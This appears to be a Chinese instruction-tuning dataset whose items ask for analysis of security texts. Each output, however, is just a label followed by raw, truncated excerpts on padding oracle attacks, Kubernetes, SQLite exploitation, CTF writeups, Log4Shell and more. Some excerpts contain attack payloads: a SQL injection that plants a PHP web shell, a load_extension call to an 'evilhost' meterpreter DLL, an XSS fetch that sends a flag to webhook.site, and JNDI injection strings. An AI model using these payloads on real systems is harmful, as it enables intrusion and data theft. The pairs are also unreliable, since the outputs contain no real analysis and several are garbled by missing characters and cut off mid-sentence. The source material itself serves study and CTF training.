{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Padding Oracle Attack ## 介绍 Padding Oracle Attack 攻击一般需要满足以下几个条件 - 加密算法 - 采用 PKCS5 Padding 的加密算法 当然非对称加密中 OAEP 的填充方式也有可能会受到影响 - 分组模式为 CBC 模式 - 攻击者能力 - 攻击者可以拦截上述加密算法加密的消息 - 攻击者可以和 padding oracle即服务器 进行交互客户端向服务器端发送密文服务器端会以某种返回信息告知客户端 padding 是否正常 Padding Oracle Attack 攻击可以达到的效果如下 - 在不清楚 key 和 IV 的前提下解密任意给定的密文 ## 原理 Padding Oracle Attack 攻击的基本原理如下 - 对于很长的消息一块一块解密 - 对于每一块消息先解密消息的最后一个字节然后解密倒数第二个字节依次类推 这里我们回顾一下 CBC 的 - 加密 $$ C_i=E_K(P_i \\oplus C_{i-1})\\\\ C_0=IV $$ - 解密 $$ P_{i}=D_{K}(C_{i})\\oplus C_{i-1}\\\\ C_{0}=IV $$ 我们主要关注于解密这里我们并不知道 IV 和 key这里我们假设密文块的长度为 n 个字节 假设我们截获了密文最后两个密文块 $F$ 与 $Y$ 以获取密文块 $Y$ 的对应明文的最后一个字节为例子进行分析为了获取 $Y$ 解密后的内容我们首先需要伪造一块密文块 $F'$ 以便于可以修改 $Y$ 对应解密明文的最后一个字节这是因为若我们构造密文 `F'|Y` 那么解密 $Y$ 时具体为 $P'=D_K(Y)\\oplus F'$ 所以修改密文块 $F'$ 的最后一个字节 $F'_{n}$ 可以修改 Y 对应解密明文 $P'$ 的最后一个字节 $P'_n$ 进而反推出原先的明文 $P$ 的最后一个字节下面给出获取 $P$ 最后一个字节的过程 1. `i=0`设置 $F'$ 的每个字节为**随机字节** 2. 设置 $F'_n=i \\oplus 0x01$  3. 将 `F'|Y` 发送给服务器如果服务器端没有报错那有很大概率 $P'$ 的最后一个字节是 0x01否则只有 $P'$ 的最后 $P'_n \\oplus i \\oplus 0x01$ 字节都是 $P'_n \\oplus i \\oplus 0x01$ 才不会报错**而且需要注意的是 padding 的字节只能是 1 到 n** 因此若想要使得在 F' 随机地情况下并且满足 padding 字节大小的约束情况下还不报错**概率很小**所以在服务器端不报错的情况下我们可以认为我们确实获取了正确的字节这时可知 $D_k(Y)$ 的最后一个字节 $D_k(Y)_n$ 为 $P'_n \\oplus F'_n = 0x01 \\oplus i \\oplus 0x01 = i$ 即可知道原先的明文 $P$ 的最后一个字节 $P_n = D_k(Y)_n \\oplus F_n = i \\oplus F_n$  4. 在出现错误的情况下`i=i+1`跳转到 2. 当获取了 $P$ 的最后一个字节后我们可以继续获取 $P$ 的倒数第二个字节此时需要设置 $F'_n=D_k(Y)_n\\oplus 0x02$ 同时设置 $F_{n-1}=i \\oplus 0x02$ 去枚举 `i`以此类推我们可以获取 Y 所对应的明文 $P$ 的所有字节 所以综上所示Padding Oracle Attack 其实在一定程度上是一种具有很大概率成功的攻击方法 然而需要注意的是往往遇到的一些现实问题并不是标准的 Padding Oracle Attack 模式我们往往需要进行一些变形 ## 2017 HITCON Secret Server ### 分析 程序中采用的加密是 AES CBC其中采用的 padding 与 PKCS5 类似 ```python def pad(msg): pad_length = 16-len(msg)%16 return msg+chr(pad_length)*pad_length def unpad(msg): return msg[:-ord(msg[-1])] ``` 但是在每次 unpad 时并没有进行检测而是直接进行 unpad 其中需要注意的是每次和用户交互的函数是 - `send_msg` 接受用户的明文使用固定的 `2jpmLoSsOlQrqyqE` 作为 IV进行加密并将加密结果输出 - `recv_msg` 接受用户的 IV 和密文对密文进行解密并返回根据返回的结果会有不同的操作 ```python msg = recv_msg().strip(", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 1/20 介绍 k8s全称kubernetes是一个由google开源的用于自动部署扩展和管理容器化应用程序的开源系统通过k8s可跨多台主机进行容器编排快速按需扩展容器化应用及其资源 对应用实施状况检查服务发现和负载均衡等 组件介绍 如图所示k8s集群由主控节点Master node以下简称master和工作节点Worker Node以下简称node组成 master节点负责资源调度调度应用维护状态和应用扩容等 node节点上跑着应用服务每个Node节点有一个kubelet负责node与master之间的通信 Master node组件 1. APIserver集群统一入口以restful方式交给etcd存储用户端一般通过kubectl命令行工具与kube-apiserver进行交互 2. .Controller-manager 处理集群中常规后台任务通常一个资源对应一个控制器 3. Scheduler 节点调度选择node节点应用部署负责决定将Pod放在哪个Node上会对各个节点的负载性能数据考虑最优的node 4. Etcd 存储系统用于保存集群中相关的数据 Worker node组件 1. Kubelet Master派到node节点的agent管理本机容器的各种操作 2. Kube-proxy 提供网络代理用来实现负载均衡等操作 3. Pod 是k8s中的最小部署单元一组容器的集合一个pod中的容器是共享网络的主要是基于docker技术来搭建的 用户端命令下发通常流程如下 1客户端根据用户需求调用kube-apiserver相应api 2kube-apiserver根据命令类型联动master节点内的kube-controller-manager和kube-scheduler等组件通过kubelet进行下发新建容器配置或下发执行命令等给到对应 node节点 3node节点与容器进行交互完成下发的命令并返回结果 4master节点最终根据任务类型将结果持久化存储在etcd中 安全机制 访问k8s集群的时候需要经过三个安全步骤完成具体操作过程中都要经过apiserverapiserver做统一协调 第一步 认证判断用户是否为能够访问集群的合法用户 第二步 鉴权通过鉴权策略决定一个API调用是否合法 第三步 准入控制就算通过了上面两步客户端的调用请求还需要通过准入控制的层层考验才能获得成功的响应大致意思就是到了这步还有一个类似acl的列表如果列表有请 求内容就通过否则不通它以插件的形式运行在API Server进程中会在鉴权阶段之后对象被持久化etcd之前拦截API Server的请求对请求的资源对象执行自定义校 验修改拒绝等操作 序号 认证方式 认证凭据 1 匿名认证 Anonymous requests 2 白名单认证 BasicAuth认证 3 Token认证 WebhooksServiceAccount TokensOpenID Conne ct Tokens等 4 X509证书认证 匿名认证一般默认是关闭的 白名单认证一般是服务启动时加载的basic用户配置文件并且通常没有更多设置的话basic认证仅仅只能访问但是没有操作权限 token认证更涉及到对集群和pod的操作这是我们比较关注的 X509证书认证是kubernetes组件间内部默认使用的认证方式同时也是kubectl客户端对应的kube-config中经常使用到的访问凭证是一种比较安全的认证方式 当API Server内部通过用户认证后就会执行用户鉴权流程即通过鉴权策略决定一个API调用是否合法API Server目前支持以下鉴权策略 序号 鉴权方式 描述 1 Always 当集群不需要鉴权时选择AlwaysAllow 2 ABAC 基于属性的访问控制 3 RBAC 基于角色的访问控制 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 2/20 4 Node 一种对kubelet进行授权的特殊模式 5 Webhook 通过调用外部REST服务对用户鉴权 Always策略光看描述就知道生产环境中必定不会存在 ABAC虽然功能强大但是难以理解且配置复杂已经被RBAC替代 RBAC是目前k8s中最主要的鉴权方式 而Node鉴权策略主要是用于对kubelet发出的请求进行访问控制限制每个Node只访问它自身运行的Pod及相关ServiceEndpoints等信息 当RBAC无法满足某些特定需求时 候可自行编写鉴权逻", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWeb渗透测试之逻辑漏洞 挖掘 演讲嘉宾hackbar 上海银基信息安全技术股份有限公司 简单VS复杂 1.思考 1.1利用工具简单 数据包抓取工具Burpsuitfiddler等 1.2思路复杂 核心 绕过真实用户身份或正常业务流程达到预期的目的 1.2.1用户身份认证 用户身份特性认证 本地认证 服务器端认证 1.2.2业务流程对业务的熟悉程度各种类 型的网站业务模式 电信网厅业务清单图解 2逻辑漏洞类型 支付漏洞 密码找回漏洞 任意用户登录漏洞 认证缺陷弱认证认证凭证获取 接口枚举 越权有条件的越权空值绕过  2.1支付漏洞 2.1.1支付漏洞突破口 一订单相关 1.选择商品时修改商品价格 2.选择商品时将商品数量设为负数 3.商品剩余1时多人同时购买是否产生冲突 4.商品为0时是否还能购买 5.生成订单时修改订单金额 二结算相关 1.优惠打折活动多次重复使用 2.拦截数据包修改订单金额 3.拦截数据包修改支付方式 4.伪造虚假订单刷单 2.1.1支付漏洞突破口 三支付相关 1.拦截数据包伪造第三方确认信息 2.保存用户付款信息被窃取 四退货相关 1绕过商家确认直接退货 2绕过商品类型直接退货(退货是否允许) 五收货相关 1绕过客户确认直接收货 2.2密码重置漏洞 用户密码找回方式 手机验证码邮箱密保问题自动生成新密码密码找回链接 发送 2.2.1密码重置突破口 认证凭证暴力破解 认证凭证回显 认证凭证重复使用 重新绑定 用户身份特性认证 服务器端认证 本地认证 密码找回流程绕过  2.3任意用户登录 空密码绕过 身份替换 认证凭证篡改  2.4认证缺陷漏洞 弱验证 空验证 认证凭证有效性&唯一性 2.5越权漏洞 普通越权 未授权访问登录凭证验证 绕过授权模式参数构造等 2.6接口枚举 业务接口因为没有做验证或者验证机制缺陷容易遭到枚举攻击 撞库 订单优惠券等遍历 3案例分享 支付漏洞 任意用户密码重置漏洞 任意用户登录漏洞 3.1.1支付漏洞 一分钱看电影 3.1.1支付漏洞 一分钱看电影 3.1.1支付漏洞 一分钱看电影 3.1.1支付漏洞 一分钱看电影 3.1.1支付漏洞 一分钱看电影 3.1.1支付漏洞 一分钱看电影 3.1.2支付漏洞 某商城任意积分 兑换 3.1.2支付漏洞 某商城任意积 分兑换 由于积分不够 无法兑换: 3.1.2支付漏洞 某商城任意积 分兑换 由于积分不够 无法兑换但 是可以通过修 改数据包返回 值让页面前 端显示兑换功 能键 3.1.2支付漏洞 某商城任意积 分兑换 由于积分不够 无法兑换但 是可以通过修 改数据包返回 值让页面前 端显示兑换功 能键 3.1.2支付漏洞 某商城任意积 分兑换 3.1.2支付漏洞 某商城任意积 分兑换 3.1.2支付漏洞 某商城任意积 分兑换 3.1.2支付漏洞 某商城任意积 分兑换 3.1.2支付漏洞 某商城任意积 分兑换 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.1.3支付漏洞 某系统增值业 务免费使用 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 3.2.1密码重置漏洞 认证凭证脆弱性 商户版 3.2.1密码重置漏洞 认证凭证脆弱性 商户版 3.2.1密码重置漏洞 认证凭证脆弱性 商户版 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.2密码重置漏洞 认证凭证有效性 &唯一性 3.2.3密码重置漏洞 认证凭证回显 3.2.3密码重置漏洞 认证凭证回显 3.2.3密码重置漏洞 认证凭证回显 3.2.3密码重置漏洞 认证凭证回显 3.2.3密码重置漏洞 认证凭证回显 3.2.4密码重置漏洞 认证凭证空值绕过 3.2.4密码重置漏洞 认证凭证空值绕过 3.2.4密码重置漏洞 认证凭证空值绕过 3.2", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n欢迎参加 BlueHat Shanghai Eric Doerr 微软安全响应中心总经理 @edoerr May 30, 2019 2019 年中国的安全研究员是微软漏洞赏金 计划中成果最多影响力最大的贡献者 增长 57% 来自中国的漏 洞赏金计划参 与者 46% 来自中国的漏 洞赏金计划提 交成果 2018 vs 2019 影响力 中国48% 全球52% 漏洞赏金计划奖金 中国22% 全球78% 符合漏洞赏金计划要求的提交 2018 vs 2019 侧重点 2019 所提交漏洞类型的划分 内存安全问题 56% 信息泄露 15% 微软漏洞赏金计划 Microsoft Office Insider Microsoft .NET Core 和 ASP.Net Core Microsoft Edge Azure DevOps Microsoft Cloud Bounty Windows Defender Application Guard Windows Insider Preview Microsoft Identity Mitigation Bypass and Defense Microsoft Hyper- V Microsoft Office Insider Microsoft .NET Core 和 ASP.Net Core Microsoft Edge 提交数增加 75% Azure DevOps Microsoft Cloud Bounty Windows Defender Application Guard Windows Insider Preview 提交数增加 40% Microsoft Identity Mitigation Bypass and Defense Microsoft Hyper-V 提交数增加 50% 微软漏洞赏金计划 9 致谢 来自中国的安全研究人员和合作公 司已经证明了自己的技术实力帮 助我们一起在 2019 保护广大的用 户和整个安全生态圈 一些历史回顾 围绕安全投入的漫长历史 90 年代至 2010年 1998 MSRC 创立 2002 Bill Gates 可信计算备忘录 2003 Visual Studio 中的 缓冲区溢出保护 适用于 XP 和 Server 2003 的 Windows Defender 2004 安全开发生命 周期SDL XP SP2 提供 数据执行保护 (DEP) 2005 首届 BlueHat 2006 BitLocker 伴 随 Windows Vista 发布 2007 地址空间布局随 机化ASLR 伴随 Vista 发布 2009 AppLocker 伴随 Windows 7 发布 围绕安全投入的漫长历史 2010 年至今 2013 微软发起 首个漏洞 赏金计划 数字安全 中心成立 2014 控制流防 护CFG 伴随 Window s 8.1 发 布 2015 Office ATP 高级威胁防 护发布 微软高级威胁 分析ATA 发布 网络防御运营 中心成立 2016 微软云应用安 全服务 发布 Azure 安全 中心ASC 发布 Defender ATP 发布 2017 Credenti al Guard 伴随 Win 10 发布 Defender Exploit Guard 发 布 2018 Azure ATP 发布 FIDO2 免密 码登录 Microsoft Secure Score 发布 2019 Azure Sentinel 在 RSA 发布 Microsoft Threat Experts 发布 首届 BlueHat Shanghai CVE-2019-0708 范例 对安全的关注和投入在新版 Windows 中获得了回报  漏洞远程显示协议中的 身份验证前 UAF Use After Free   Win8Server 2012 Win10 不受影响  为结束支持的 XP Win7 和 Server 2003 发布了补丁 微软的未来 变得数字化 到 2020 年时标 准普尔 500 公司 的平均年龄会达到 12 岁 50% 的标普 500 公司将在 2026年 被取代 1 百万/小时 到 2020 年新 设备的上线速度 60% 计算能力 到 2025 年将通过 云平台提供 为了不落后于时代 每个组织都必须成 为软件公司 微软云 应用程序创新 业务应用 安全和管理 数据 人工智能和机器 学习 生产力 Power BI 高级威胁防护 安全中心 认知服务 机器学习 Azure全球规模 超过95% 的世界500强公司使用 Azure 开发者是每个公司业务创新的 核心 最多贡献者 2018 年 11 亿人 最多开发者 3600 万人 增速最快 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Google Hackers Guide johnny@ihackstuff.com http://johnny.ihackstuff.com - Page 1 - The Google Hackers Guide Understanding and Defending Against the Google Hacker by Johnny Long johnny@ihackstuff.com http://johnny.ihackstuff.com The Google Hackers Guide johnny@ihackstuff.com http://johnny.ihackstuff.com - Page 2 - GOOGLE SEARCH TECHNIQUES................................................................................................................ 3 GOOGLE WEB INTERFACE................................................................................................................................... 3 BASIC SEARCH TECHNIQUES .............................................................................................................................. 7 GOOGLE ADVANCED OPERATORS ........................................................................................................... 9 ABOUT GOOGLES URL SYNTAX .................................................................................................................... 12 GOOGLE HACKING TECHNIQUES........................................................................................................... 13 DOMAIN SEARCHES USING THE SITE OPERATOR........................................................................................... 13 FINDING GOOGLETURDS USING THE SITE OPERATOR................................................................................. 14 SITE MAPPING: MORE ABOUT THE SITE OPERATOR...................................................................................... 15 FINDING DIRECTORY LISTINGS........................................................................................................................ 16 VERSIONING: OBTAINING THE WEB SERVER SOFTWARE / VERSION............................................................. 17 via directory listings ...................................................................................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMany Birds, One Stone: Exploiting a Single SQLite Vulnerability Across Multiple Software Kun Yang(@KelwinYang) About us  Beijing Chaitin Tech Co., Ltd(@ChaitinTech)  https://chaitin.cn/en  pentesting services and enterprise products  Chaitin Security Research Lab  Pwn2Own 2017 3rd place  GeekPwn 2015/2016 awardees: PS4 Jailbreak, Android rooting  CTF players from team b1o0p, 2nd place at DEF CON CTF 2016  Acknowledgement  Siji Feng(a.k.a slipper)  Zhi Zhou(@CodeColorist) 2 SQLite SQLite is a self-contained, high-reliability, embedded, full-featured, public-domain, SQL database engine. SQLite is the most used database engine in the world.  Storage backend for web browsers  Programming language binding  Web database  Embedded database for mobile apps  Database on IOT devices 3 Known Attacks on SQLite SQLite3 Injection Cheat Sheet  Attach Database  ?id=bob'; ATTACH DATABASE '/var/www/lol.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ('<? system($_GET['cmd']); ?>';--  SELECT load_extension()  ?name=123 UNION SELECT 1,load_extension('\\\\evilhost\\evilshare\\meterpreter.dll','DllMain');-- 4 Memory Corruption SQLite database: file format with inevitable memory corruption bugs  CVE-2015-7036  Parsing a malformed database file will cause a heap overflow of several bytes in the function sqlite3VdbeExec()  CVE-2017-10989  mishandles undersized RTree blobs in a crafted database, leading to a heap-based buffer over-read 5 Memory Corruption SQLite interpreter: more flexible ways to trigger bugs in sql statements  CVE-2015-3414  SQLite before 3.8.9 does not properly implement the dequoting of collation-sequence names, as demonstrated by COLLATE\"\"\"\"\"\"\"\" at the end of a SELECT statement.  CVE-2015-3415  The sqlite3VdbeExec function in vdbe.c in SQLite before 3.8.9 does not properly implement comparison operators, as demonstrated by CHECK(0&O>O) in a CREATE TABLE statement. 6 Fuzzing SQLite Previous work of Michał Zalewski: AFL: Finding bugs in SQLit", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n%2F 构造路径穿越, exp 如下 bytedance 2022 Nu1L Compare from pwn import * import random from fractions import Fraction from Crypto.Util.number import * CHALLENGE_ID = 'c34409b34458e108242ea271d5126481' r = remote(CHALLENGE_ID + '.2022.capturetheflag.fun', 1337, ssl=True) context(log_level='debug') MSG = b'MSG//2**512==0' r.sendlineafter(b'Hello, Give me your expr: ', MSG) for _ in range(100): r.recvuntil(b'n = ') n = int(r.recvline().decode().strip()) r.recvuntil(b'g = ') g = int(r.recvline().decode().strip()) r.recvuntil(b'a = ') a = int(r.recvline().decode().strip()) r.recvuntil(b'b = ') b = int(r.recvline().decode().strip()) inv_b = pow(b, -1, n**2) x = a * inv_b % n**2 r.sendlineafter(b'msg = ', f'{x}'.encode()) r.interactive() PYTHON Silver Droid 离谱题直接logcat就有IMEI ByteCTF{8606351760878824} service.jar 有个东西 framework.jar 思路 用 godGiveMeAddService 覆盖 task_activity <script> fetch(\"https://xxx.com/local_cache/..%2Ffiles%2Fflag\").then(x => x.text()).then(x => {document.write(x);fetch(\"https://webhook.site/3fefdb0a-4e66- 491f-8246-9284dbddb1a2/flag=\"+x)}); </script> HTML Find IMEI Android MITM static final int TRANSACTION_godGiveMeAddService = 0xDF; case 0xDF: parcel2.enforceInterface(\"android.app.IActivityManager\"); iActivityManager$Stub0.godGiveMeAddService(data.readString(), data.readStrongBinder()); reply.writeNoException(); JAVA 构造中间人服务 package ; import Service; import Context; import Intent; import IBinder; import RemoteException; import Log; import InvocationTargetException; public class FakeService extends Service { String TAG = \"CTF1\"; private IBinder mbinder; private IBinder old_binder; @Override public void onCreate() { super.onCreate(); try { old_binder = (IBinder)Class.forName(\"android.os.ServiceManager\").getDeclaredM ethod(\"getService\", String.class).invoke(null, \"activity_task\"); mbinder = new ServerBinder(old_binder); IBinder am = (IBinder)Class.forName(\"android.os.ServiceManager\").getDeclaredM ethod(\"getService\", String.class).invoke(null, Context.ACTIVITY_SER", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCybricsCTF WriteUp By Nu1L Author : Nu1L CybricsCTF WriteUp By Nu1L CTB Little Buggy Editor rm -rfer GrOSs 1 Reverse Walker Kernel Reverse Paired Listing Network LX-100 ASCII Terminal WEB Multichat Ad Network Announcement Cyber Signer scanner GrOSs 2 Forensic Recording Namecheck rebyC CAPTCHA The Flag CTB Little Buggy Editor curses vim flag /etc/flag.txt buffer 500 * 500 _maxy _maxx _maxy _maxx terminator GlobalBuffer, FileName /etc/flag.txt rm -rfer GrOSs 1 flag Reverse Walker flag.txtstartread dulrcf cCHECKPOINT + 1 fCHECKPOINT4 xyCHECKPOINT dump10x10cxy keykey01 size5ckey checkpoint dfs buildbox:/# echo 'set line=($<)' > test.sh buildbox:/# echo 'while($#line > 0)' >> test.sh buildbox:/# echo 'echo $line' >> test.sh buildbox:/# echo 'set line= ( $< )' >> test.sh buildbox:/# echo end >> test.sh buildbox:/# source test.sh < /etc/ctf/flag.txt cybrics{cREUaGdddrcBtdtpruurrrrddddllcFGRiQllddrrrrrddlllcikhAcf} Kernel Reverse ioctl0x5702xor 0x13373389Flag Paired 2EXEdlldbexecheck flag exeexedlldllkey value db cREUaG //checkpoint 1 dddr cBtdtp //checkpoint 2 ruurrrrddddll cFGRiQ //checkpoint 3 llddrrrrrddlll cikhAcf // checkpoint 4 #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <time.h> int main() { int fd = open(\"/dev/ioctl\", O_RDWR); unsigned char * flag[512]; *(unsigned int *)flag = time(0)  0x13373389u; ioctl(fd, 0x5702, &flag); puts(flag); } app13checkcheckdbdummy_string stage 2. checkenablestage 3. Fcheckdbshellcodecheck this_is_just_some_random_string!check stage 3app2checkapp2app10x400 app1app2dllapp2 shellcodeapp1app1app2shellcode shellcodeflag0x81'rbyc' storage(7) = 0x767c unk_4D70000[8] = dword ptr flag[0] storage(7) += dword ptr unk_4D70000[8] storage(7) = storage(7) == 0x909b110c tot += 1 storage(7) = 0xe20b unk_4D70000[8] = dword ptr flag[1] storage(7) += dword ptr unk_4D70000[8] storage(7) = storage(7) == 0x9a917ca5 tot += 1 storage(7) = 0xc323 unk_4D70000[8] = dword ptr flag[2] storage(7) += dwor", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n实战攻防演习之 紫队视角下的实战攻防演习组织 1 实战攻防演习之 紫队视角下的实战攻防演习组织 3 前 言 网络实战攻防演习是新形势下关键信息系统网络 安全保护工作的重要组成部分演习通常是以实际运 行的信息系统为保护目标通过有监督的攻防对抗 最大限度地模拟真实的网络攻击以此来检验信息系 统的实际安全性和运维保障的实际有效性 2016年以来在国家监管机构的有力推动下网 络实战攻防演习日益得到重视演习范围越来越广 演习周期越来越长演习规模越来越大国家有关部 门组织的全国性网络实战攻防演习从2016年仅有几家 参演单位到2019年已扩展到上百家参演单位同时 各省各市各行业的监管机构也都在积极地筹备 和组织各自管辖范围内的实战演习一时间网络实 战攻防演习遍地开花 在演习规模不断扩大的同时攻防双方的技术水平 和对抗能力也在博弈中不断升级 2016年网络实战攻防演习尚处于起步阶段攻 防重点大多集中于互联网入口或内网边界 2017年实战攻防演习开始与重大活动的网络安 全保障工作紧密结合就演习成果来看从互联网侧 实战攻防演习之 紫队视角下的实战攻防演习组织 4 发起的直接攻击仍然普遍十分有效而系统的外层防 护一旦被突破横向移动跨域攻击往往都比较容 易实现 2018年网络实战攻防演习开始向行业和地方深 入伴随着演习经验的不断丰富和大数据安全技术的 广泛应用防守方对攻击行为的监测发现和溯源能 力大幅增强与之相应的攻击队开始更多地转向精 准攻击和供应链攻击等新型作战策略 2019年以来网络实战攻防演习工作受到了监 管部门政企机构和安全企业的空前重视流量分 析EDR蜜罐白名单等专业监测与防护技术被防 守队广泛采用攻击难度的加大也迫使攻击队全面升 级诸如0day漏洞攻击1day漏洞攻击身份仿冒 钓鱼WiFi鱼叉邮件水坑攻击等高级攻击手法在 实战攻防演练中均已不再罕见攻防演习与网络实战 的水平更加接近 如何更好地参与网络实战攻防演习如何更好地借 助实战攻防演习提升自身的安全能力这已经成为大 型政企机构运营者关心的重要问题 作为国内领先的网络安全企业奇安信集团已成为 全国各类网络实战攻防演习的主力军奇安信集团安 实战攻防演习之 紫队视角下的实战攻防演习组织 5 服团队结合200余次实战攻防演习经验总结编撰了这 套实战攻防演习系列丛书分别从红队视角蓝队视 角和紫队视角来解读网络实战攻防演习的要领以 及如何结合演习提升政企机构的安全能力 需要说明的是实战攻防演习中的红方与蓝方对抗 实际上是沿用了军事演习的概念和方法一般来说 红方与蓝方分别代表攻击方与防守方不过红方和 蓝方的名词定义尚无严格的规定也有一些实际的攻 防演习将蓝队设为攻击队将红队设为防守队在 本系列丛书中我们依据绝大多数网络安全工作者的 习惯统一将攻击队命名为红队将防守队命名为蓝 队而紫队则代表组织演练的机构 紫队视角下的实战攻防演习组织是本系列丛书 的第三本本书重点介绍实战环境下的紫队工作提 出组织实战攻防演习的四个阶段给出实战攻防演习 的组织要素组织形式明确演习各方的人员职责 描述每阶段需开展的重点工作并提示在开展实战攻 防演习时应规避的风险 实战攻防演习之 紫队视角下的实战攻防演习组织 6 目 录 第一章 什么是紫队......................................1 一实战攻防演习组织要素...................................1 二实战攻防演习组织形式...................................3 三实战攻防演习组织关键...................................3 第二章 实战攻防演习组织的四个阶段..............6 一组织策划阶段..................................................6 二前期准备阶段................................................15 三实战攻防演习阶段.........................................17 四演习总结阶段................................................20 第三章 实战攻防演习风险规避措施...............24 一演习限定攻击目标系统不限定攻击路径...24 二除授权外演习不允许使用拒绝服务攻击...24 实战攻防演习之 紫队视角下的实战攻防演习组织 7 三网页篡改攻击方式的说明.............................24 四演习禁止采用的攻击方式.............................25 五攻击方木马使用要求.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2021 年 12  9 号注定是个不眠之夜著名的Apache Log4j 项被爆存在远程代码执漏洞 且利简单影响危害巨光是引了 log4j2 依赖的组件都是数不清更别提项本身可能存 在的险了如下图所示mvnrepository搜索引了 log4j-core version 2.14.1的项就  了 本就来简单分析下该漏洞的原理 引了版本处于2.x < 2.15.0-rc2的 Apache log4j-core的应项或组件 根据官的修订信息https://issues.apache.org/jira/projects/LOG4J2/issues/LOG4J2- 3201?lter=allissues 001 写在前 002 影响范围 003 漏洞分析 可以明确知道是通过 jndi 中 LDAP 注的式实现了 RCE然后查看其补丁的更改记录 可以发现对 lookup 函数进了修改判断 知道了漏洞类型那么就好了先翻阅官档中关于 lookup 的说明 lookup 提供了种在任意位置向 Log4j2 配置添加值的法是实现 StrLookup 接的特殊类型 的插件 查看官档发现log4j2 持的法有很多 总计有 base64  data  ctx  main  env  sys  sd  java  marker  jndi  jvmrunargs  map  bundle  log4j 由于这主要说明的是关于 JNDI lookup 的法其他的不再赘述 关于 JNDI lookup官档有说明 JndiLookup 允许通过 JNDI 检索变量然后给了示例 实际上通过 log4j2 持的法那张图中就可以发现log4j 中 jdni 的法格式如下 既然明确了 lookup 是触发漏洞的点并且找到了可以触发 lookup 的法 那么就可以找 点只要找到点然后传 jndi 调 ldap 的式就能够实现 RCE 那么哪个点可以传 ${jndi:JNDIContent} 呢 没错了就是 LogManager.getLogger().xxxx() 法 在log4j2中共有8 个志级别可以通过 LogManager.getLogger() 调记录志的法如 下 上述列表中 error() 和 fatal() 法可默认触发漏洞其余的法需要配置志级别才可以触 发漏洞因为在 logIfEnabled 法中对当前志等级进了次判断 <File name=\"Application\" fileName=\"application.log\"> <PatternLayout> <pattern>%d %p %c{1.} [%t] $${jndi:logging/context-name} %m%n</pattern> </PatternLayout> </File> ${jndi:JNDIContent} LogManager.getLogger().error() LogManager.getLogger().fatal() LogManager.getLogger().trace() LogManager.getLogger().traceExit() LogManager.getLogger().traceEntry() LogManager.getLogger().info() LogManager.getLogger().warn() LogManager.getLogger().debug() LogManager.getLogger().log() LogManager.getLogger().printf() 只有当当前事件的志等级于等于设置的志等级时才会符合条件进 logMessage() 法 知道这些基本信息后就可以进步了解漏洞的触发原理了 测试 case 如下 public class log4j { private static final Logger logger = LogManager.getLogger(); public static void main(String[] args) { Collection< Logger> current = LoggerContext.getContext(false).getLoggers(); Collection< Logger> notcurrent = LoggerContext.getContext().getLoggers(); Collection< Logger> allConfig = current; allConfig.addAll(notcurrent); for ( Logger log:allConfig){ log.setLevel(Level.ALL); } l", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBeing in the Know An overview to Scanning modern radio systems Presented by: Brett & Taylor Defcon 15 The Basics  Simplex  One frequency shared by multiple stations  Limited coverage  Tones  Continuous Tone Coded Squelch System (CTCSS)  Private Line (PL)  Digital Coded Squelch (DCS)  Repeaters  Two frequencies (input & output)  Increased Coverage So you want to listen to stuff  Back in the day it was easy  You just dialed in the frequency and you were good to go.  154.905 Utah Highway Patrol SLC  155.505 Statewide  154.2350 SLCO Fire Dispatch  Not quite as easy these days  Trunked, Digital, Encrypted, etc What is Trunked Radio  Users are grouped by Talk Group rather than Frequency  Radios monitor a central channel called the Control Channel  When a user keys the radio the control channel tells other what frequency to move to  When done, users return to the control channel and wait for the next call System Types  Ericsson (EDACS)  Enhanced Digital Access Communication System  E.F Johnson (LTR)  Logical Trunked Radio  Motorola  Probably the most common type of system Ericsson Enhanced Digital Access Communication System (EDACS) EDACS - Overview  Central Control Channel  Each frequency is assigned an LCN  Logical Channel Number  Controller tells radios what LCN to switch to when radio traffic is present  Frequencies must be entered in LCN order to scan properly E.F Johnson Logical Trunked 